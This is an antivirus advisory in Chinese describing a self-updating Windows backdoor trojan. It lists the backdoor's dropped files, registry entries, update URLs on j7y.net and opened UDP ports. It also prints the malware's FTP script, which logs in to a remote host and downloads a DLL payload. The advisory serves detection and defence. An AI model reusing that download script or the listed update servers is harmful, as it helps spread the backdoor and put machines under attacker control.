概述
病毒別名: 處理時間:2006-12-08 威脅級別:★
中文名稱: 病毒類型:黑客程式 影響系統:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
病毒行為:
該病毒是一個會自動線上更新的後門程式。該病毒會在系統留下後門供黑客控制感染機器。建議電腦用戶升級病毒庫及打開防火牆,以免中毒受害。
1、生成的檔案
C:\WINNT\system32\wbem\winlogon.exe
C:\WINNT\system32\wmvdmoes32.dll
C:\WINNT\system32\wbem\SysOption.bin
C:\WINNT\system32\AddrConfig.bin
C:\WINNT\system32\wbem\kbd101ab.dll
C:\WINNT\system32\wbem\ddes\BoExplorer.rar
C:\WINNT\system32\wbem\ddes\DownBoExplorer.rar
C:\WINNT\system32\x
2、
HKCR\TypeLib\\1.0\0\win32
(Default)
"C:\WINNT\system32\wbem\winlogon.exe"
HKCR\CLSID\\TypeLib
(Default)
""
3、
HKCR\CLSID\
(Default)
"SysBackHelper Object"
HKCR\CLSID\\LocalServer32
(Default)
"C:\WINNT\system32\wbem\winlogon.exe"
4、下載http://upcfg.j7y.net/upcfg/Newdownurl.txt文本取得線上更新地址列表。
5、線上更新地址列表
http://update.j7y.net/NewUpdate/
http://down1.j7y.net/NewUpdate/
http://down2.j7y.net/NewUpdate/
6、該病毒會調用ftp程式執行檔案x指令,如下:
-------------------------------------------
open 192.168.4.144 7313
user netapi x
bin
get jlkkul.dll
bye
-------------------------------------------
7、該病毒開啟6100及10**兩個UDP連線埠,接收黑客輸入指令和收集用戶信息。
